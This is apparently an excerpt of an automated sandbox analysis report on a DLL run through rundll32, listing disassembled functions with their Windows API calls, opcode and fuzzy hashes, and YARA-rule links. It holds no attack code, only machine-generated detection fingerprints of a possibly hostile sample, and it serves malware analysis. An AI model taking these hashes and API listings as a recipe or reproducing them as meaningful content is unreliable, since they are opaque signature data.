Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
String ID:
API String ID: 1532457625-0
Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

CharNextA.USER32(?), ref: 10022C6D

Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99

CharNextA.USER32(00000000), ref: 10022C8A
_strtol.LIBCMT ref: 10022CB5
_strtoul.LIBCMT ref: 10022CBC

Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32 ref: 10027B4F
CoTaskMemFree.OLE32(?), ref: 10027BD2

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64

Uniqueness

Uniqueness Score: -1.00%

Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100266F4
GetRgnBox.GDI32(?,?), ref: 1002676F
IntersectRect.USER32(?,?,?), ref: 10026784
EqualRect.USER32 ref: 10026792

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001FCF4

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

__CxxThrowException@8.LIBCMT ref: 1001FD2A
FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53

Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA

LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754

Uniqueness

Uniqueness Score: -1.00%

Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 100170A7
LoadResource.KERNEL32(?,00000000), ref: 100170AF
LockResource.KERNEL32(00000000), ref: 100170C1
FreeResource.KERNEL32(00000000), ref: 1001710B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001512A

Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D

__strdup.LIBCMT ref: 1001514C
GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
GetCurrentThreadId.KERNEL32 ref: 10015182

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04

Uniqueness

Uniqueness Score: -1.00%

Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
RegCloseKey.ADVAPI32(00000000), ref: 1001774B
_swprintf.LIBCMT ref: 10017768
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5

Uniqueness

Uniqueness Score: -1.00%

Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 10017C70
LoadResource.KERNEL32(?,00000000), ref: 10017C7C
LockResource.KERNEL32(00000000), ref: 10017C8A
FreeResource.KERNEL32(00000000), ref: 10017CB8

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

IntersectRect.USER32(?,00000000,?), ref: 1002669C
EqualRect.USER32 ref: 100266A9
IsRectEmpty.USER32 ref: 100266B3
InvalidateRect.USER32(?,?,?), ref: 100266D0

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
DuplicateHandle.KERNEL32 ref: 10021651
GetLastError.KERNEL32(?), ref: 1002166C

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32 ref: 100155F0

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetFocus.USER32 ref: 10015607
GetParent.USER32(?), ref: 10015615
SendMessageA.USER32 ref: 10015628

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: EnableException@8FocusItemMenuMessageParentSendThrow
String ID:
API String ID: 4211600527-0
Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(00000000), ref: 1001B97C
GetTopWindow.USER32(00000000), ref: 1001B9BB
GetWindow.USER32(00000000,00000002), ref: 1001B9D9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1001B338
GetTopWindow.USER32(00000000), ref: 1001B34B

Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392

GetTopWindow.USER32(?), ref: 1001B37B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003CA19

Part of subcall function 1003C844: __fltout2.LIBCMT ref: 1003C86E

__cftog_l.LIBCMT ref: 1003CA3F
__cftoe_l.LIBCMT ref: 1003CA71

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82

Uniqueness

Uniqueness Score: -1.00%

Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 1002BC45
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA

__amsg_exit.LIBCMT ref: 1003A571
__lock.LIBCMT ref: 1003A581
InterlockedDecrement.KERNEL32(?), ref: 1003A59E
InterlockedIncrement.KERNEL32(00711520), ref: 1003A5C9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 1001DCA7
LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,2A2BF92F), ref: 1001DCB3
LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,2A2BF92F), ref: 1001DCC0
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,2A2BF92F), ref: 1001DCDB

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
